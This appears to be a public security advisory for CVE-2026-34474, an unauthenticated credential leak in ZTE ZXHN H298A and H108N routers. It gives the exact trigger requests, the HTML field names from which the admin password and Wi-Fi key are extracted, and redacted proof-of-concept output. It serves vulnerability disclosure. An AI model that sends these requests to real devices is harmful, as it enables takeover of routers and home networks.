Summary Executive Summary The exploit path is a direct authentication-boundary failure. An unauthenticated request to /getpage.lua with pid=1000&ETHCheat=1 returns credential-bearing HTML on the affected H298A 1.1 and H108N 2.6 builds, including the administrator password and WLAN PSK. A related wizard endpoint also leaks serial information, showing that the disclosure surface is broader than one isolated DOM field. Root Cause The unauthenticated ETHCheat path returns privileged configuration data inside the response body itself. The leak is visible in rendered HTML and can be harvested directly from hidden input values. Exploit Path Send GET /getpage.lua with pid=1000&ETHCheat=1 . The response returns credential-bearing HTML fields without login. Extract OBJ_USERINFO_IDPassword1 WLANPSK_KeyPassphrase1 WLANAP_ESSID1 Query wizard_overETHfail_set_lua.lua for serial data. Use the leaked admin and WLAN secrets to cross the auth boundary. Key Takeaway This is not a weak-password issue. The management interface itself discloses the live secrets to unauthenticated callers on the affected builds. Trigger Requests Observed requests preserved in the original PoC material. Unauthenticated GET GET /getpage.lua?pid=1000&ETHCheat=1 GET /wizard_page/wizard_overETHfail_set_lua.lua Representative fields extracted by the PoC: - OBJ_USERINFO_IDPassword1 - WLANPSK_KeyPassphrase1 - WLANAP_ESSID1 - SerialNumber The extraction script in poc/extract_ethcheat_credentials.py does not depend on browser state. It simply requests the page and regex-matches the secrets from the returned markup. Affected Devices The public CVE record is scoped to the locally reported and tested H-series-adjacent targets below: ZTE ZXHN H298A 1.1 and ZTE ZXHN H108N 2.6 . The original evidence set also notes that some same-model variants exposed only partial identifiers such as username, ESSID, serial number, or MAC address rather than the full admin-and-WLAN secret set. ZXHN H298A V1.1 ZXHN H108N V2.6 ETHCheat path Wizard serial endpoint PoC Snapshot The original 2024 proof set included an automated extractor and supporting screenshots. The public writeup uses redacted sample output while preserving the original artifacts in this repo. Example PoC run Redacted output based on the preserved extraction script and field names. Copy PS> python .\poc\extract_ethcheat_credentials.py [+] endpoint ............. /getpage.lua?pid=1000&ETHCheat=1 [+] admin_password .... [REDACTED] [+] wlan_psk ........... [REDACTED] [+] essid .............. [REDACTED] [+] serial_number ...... [REDACTED] [+] result ............. credential leak confirmed ETHCheat path. Original local screenshot from the 2024 validation set used to preserve the leak behavior of the crafted management-page request. Response capture. Companion screenshot from the same evidence set showing the returned data surface used by the extraction script. Impact and Limits Impact The returned administrator password allows direct access to the management interface on affected builds. The WLAN PSK disclosure extends the impact beyond the web panel and into local network access. Serial and identifier leakage provides additional device intelligence even on reduced-disclosure variants. Limits The public CVE record currently names only H298A 1.1 and H108N 2.6. Some same-model variants reportedly leaked a smaller field set instead of the full admin-and-WLAN secret set. While the underlying server-side Lua implementation for the ETHCheat branch remains opaque, the black-box exposure is absolute: the router deterministically serves plaintext secrets to unauthenticated callers. Root Cause Analysis This is not a weak-password or brute-force issue; it is a fundamental breakdown of the authentication boundary. Four details highlight the severity of this exposure: 1. The trigger is deterministic The PoC does not rely on timing, session reuse, or post-auth state. A direct GET request to getpage.lua?pid=1000&ETHCheat=1 is enough to reproduce the disclosure path on the affected builds. 2. The secrets are in the response body The administrator password and WLAN PSK are not inferred indirectly. The extraction script pulls them from named HTML fields such as OBJ_USERINFO_IDPassword1 and WLANPSK_KeyPassphrase1 . 3. A related endpoint leaks device identity data The companion request to wizard_overETHfail_set_lua.lua exposes the serial number in structured output, which shows the disclosure surface is broader than one page template. 4. Variant behavior differs, but the auth boundary still fails Even where the same model family leaks only username, ESSID, serial, or MAC address, the router is still returning sensitive management data to an unauthenticated caller. The core bug is the same broken trust boundary. Evidence Boundaries This repo preserves the original proof material and the later CVE-assignment trail. The exposure is validated through black-box testing and deterministic response capturing, proving the vulnerability exists at the highest impact level even without access to the proprietary server-side Lua implementation. What The Current Evidence Shows The leak is reproducible with unauthenticated requests. The extracted values are named directly in the returned markup and structured endpoint output. The impact aligns with the official CVE record: information disclosure leading to auth bypass and Wi-Fi compromise. Open Reverse-Engineering Track Recover the exact server-side implementation that honors ETHCheat=1 . Map the code path that populates OBJ_USERINFO_IDPassword1 and WLANPSK_KeyPassphrase1 . Determine whether later operator builds removed the branch entirely or only reduced the returned field set. Where the Leak Appears in Returned Markup The current strongest technical evidence is not a decompiled source file; it is the returned content itself and the field names the extractor reads from it. Credential-bearing HTML fields Reconstructed from the original page captures and extraction script. Copy <input id='OBJ_USERINFO_IDPassword1' value='[REDACTED]' /> <input id='WLANAP_ESSID1' value='[REDACTED]' /> <input id='WLANPSK_KeyPassphrase1' value='[REDACTED]' /> Related serial-number disclosure Pattern pulled by poc/check_serialnumber_endpoint.py . Copy <ParaName>SerialNumber</ParaName> <ParaValue>[REDACTED]</ParaValue> Vendor Position ZTE PSIRT acknowledged the original report in May 2024 and later stated on 2026-02-02 that the H298A and H108N products had been discontinued in 2022 and 2023 respectively, placing them outside the scope of vulnerability submission and declining vendor-side CVE assignment. MITRE later assigned CVE-2026-34474 and requested a public reference URL. That is why this writeup focuses on preserving the original proof material and the technical minimum needed to anchor the public record, even though a vendor remediation narrative is not available. Sources Primary public references used to anchor the official record and the vendor's public EOS position. CVE Record Official description and publication record for CVE-2026-34474 NVD NVD publication record for the same issue Public Advisory Gist Public reference URL submitted to MITRE after assignment ZTE EOS Notice Vendor link cited by ZTE for one of the affected products ZTE EOS Notice Second vendor EOS link cited in the 2026 decline message